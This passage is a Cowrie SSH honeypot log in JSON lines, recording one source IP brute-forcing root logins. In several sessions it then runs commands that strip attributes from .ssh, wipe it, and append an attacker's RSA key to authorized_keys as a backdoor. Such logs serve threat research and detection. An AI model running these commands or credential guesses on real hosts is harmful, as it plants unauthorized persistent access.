mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:00:05.441805Z","src_ip":"134.199.225.42","session":"45fee6db161d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:00:05.601386Z","src_ip":"134.199.225.42","session":"45fee6db161d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:00:05.602252Z","src_ip":"134.199.225.42","session":"45fee6db161d"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":47596,"dst_ip":"1.2.3.4","dst_port":22,"session":"78a8879aa605","protocol":"ssh","message":"New connection: 134.199.225.42:47596 (1.2.3.4:22) [session: 78a8879aa605]","sensor":"my-vps","timestamp":"2025-08-26T06:00:05.756067Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:00:05.757094Z","src_ip":"134.199.225.42","session":"78a8879aa605"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:00:05.913728Z","src_ip":"134.199.225.42","session":"78a8879aa605"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:00:06.581365Z","src_ip":"134.199.225.42","session":"78a8879aa605"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:00:07.740708Z","src_ip":"134.199.225.42","session":"78a8879aa605"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":60182,"dst_ip":"1.2.3.4","dst_port":22,"session":"b955f35190fd","protocol":"ssh","message":"New connection: 134.199.225.42:60182 (1.2.3.4:22) [session: b955f35190fd]","sensor":"my-vps","timestamp":"2025-08-26T06:00:07.897949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:00:07.899135Z","src_ip":"134.199.225.42","session":"b955f35190fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:00:08.057172Z","src_ip":"134.199.225.42","session":"b955f35190fd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:00:08.731012Z","src_ip":"134.199.225.42","session":"b955f35190fd"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:00:08.890194Z","src_ip":"134.199.225.42","session":"45fee6db161d"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:00:08.891100Z","src_ip":"134.199.225.42","session":"b955f35190fd"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":35004,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca6159b3ef29","protocol":"ssh","message":"New connection: 134.199.225.42:35004 (1.2.3.4:22) [session: ca6159b3ef29]","sensor":"my-vps","timestamp":"2025-08-26T06:01:02.609014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:01:02.610160Z","src_ip":"134.199.225.42","session":"ca6159b3ef29"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:01:02.769897Z","src_ip":"134.199.225.42","session":"ca6159b3ef29"}
{"eventid":"cowrie.login.failed","username":"php","password":"php","message":"login attempt [php/php] failed","sensor":"my-vps","timestamp":"2025-08-26T06:01:03.448397Z","src_ip":"134.199.225.42","session":"ca6159b3ef29"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:01:04.610586Z","src_ip":"134.199.225.42","session":"ca6159b3ef29"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":59316,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c8a29e56957","protocol":"ssh","message":"New connection: 134.199.225.42:59316 (1.2.3.4:22) [session: 8c8a29e56957]","sensor":"my-vps","timestamp":"2025-08-26T06:02:05.031349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:02:05.034867Z","src_ip":"134.199.225.42","session":"8c8a29e56957"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:02:05.196815Z","src_ip":"134.199.225.42","session":"8c8a29e56957"}
{"eventid":"cowrie.login.failed","username":"temp","password":"1234","message":"login attempt [temp/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T06:02:05.879416Z","src_ip":"134.199.225.42","session":"8c8a29e56957"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:02:07.041550Z","src_ip":"134.199.225.42","session":"8c8a29e56957"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":37390,"dst_ip":"1.2.3.4","dst_port":22,"session":"66b037a5bfb9","protocol":"ssh","message":"New connection: 134.199.225.42:37390 (1.2.3.4:22) [session: 66b037a5bfb9]","sensor":"my-vps","timestamp":"2025-08-26T06:03:08.047981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:03:08.048946Z","src_ip":"134.199.225.42","session":"66b037a5bfb9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:03:08.208192Z","src_ip":"134.199.225.42","session":"66b037a5bfb9"}
{"eventid":"cowrie.login.success","username":"root","password":"Abcde12345","message":"login attempt [root/Abcde12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:03:08.887153Z","src_ip":"134.199.225.42","session":"66b037a5bfb9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:03:09.275626Z","src_ip":"134.199.225.42","session":"66b037a5bfb9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:03:09.276444Z","src_ip":"134.199.225.42","session":"66b037a5bfb9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:03:09.277587Z","src_ip":"134.199.225.42","session":"66b037a5bfb9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:03:09.438760Z","src_ip":"134.199.225.42","session":"66b037a5bfb9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:03:09.813906Z","src_ip":"134.199.225.42","session":"66b037a5bfb9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:03:09.814703Z","src_ip":"134.199.225.42","session":"66b037a5bfb9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:03:09.975995Z","src_ip":"134.199.225.42","session":"66b037a5bfb9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:03:09.977064Z","src_ip":"134.199.225.42","session":"66b037a5bfb9"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":37404,"dst_ip":"1.2.3.4","dst_port":22,"session":"96447abf85cd","protocol":"ssh","message":"New connection: 134.199.225.42:37404 (1.2.3.4:22) [session: 96447abf85cd]","sensor":"my-vps","timestamp":"2025-08-26T06:03:10.130365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:03:10.131433Z","src_ip":"134.199.225.42","session":"96447abf85cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:03:10.287906Z","src_ip":"134.199.225.42","session":"96447abf85cd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:03:10.955710Z","src_ip":"134.199.225.42","session":"96447abf85cd"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:03:12.115119Z","src_ip":"134.199.225.42","session":"96447abf85cd"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":37416,"dst_ip":"1.2.3.4","dst_port":22,"session":"07e7053172a3","protocol":"ssh","message":"New connection: 134.199.225.42:37416 (1.2.3.4:22) [session: 07e7053172a3]","sensor":"my-vps","timestamp":"2025-08-26T06:03:12.271539Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:03:12.272799Z","src_ip":"134.199.225.42","session":"07e7053172a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:03:12.430287Z","src_ip":"134.199.225.42","session":"07e7053172a3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:03:13.100091Z","src_ip":"134.199.225.42","session":"07e7053172a3"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:03:13.260435Z","src_ip":"134.199.225.42","session":"07e7053172a3"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:03:13.261656Z","src_ip":"134.199.225.42","session":"66b037a5bfb9"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":41714,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b8e8aed7084","protocol":"ssh","message":"New connection: 134.199.225.42:41714 (1.2.3.4:22) [session: 5b8e8aed7084]","sensor":"my-vps","timestamp":"2025-08-26T06:04:10.076824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:04:10.077859Z","src_ip":"134.199.225.42","session":"5b8e8aed7084"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:04:10.234181Z","src_ip":"134.199.225.42","session":"5b8e8aed7084"}
{"eventid":"cowrie.login.success","username":"root","password":"Bismillah@123","message":"login attempt [root/Bismillah@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:04:10.900002Z","src_ip":"134.199.225.42","session":"5b8e8aed7084"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:04:11.233150Z","src_ip":"134.199.225.42","session":"5b8e8aed7084"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:04:11.233835Z","src_ip":"134.199.225.42","session":"5b8e8aed7084"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:04:11.234960Z","src_ip":"134.199.225.42","session":"5b8e8aed7084"}
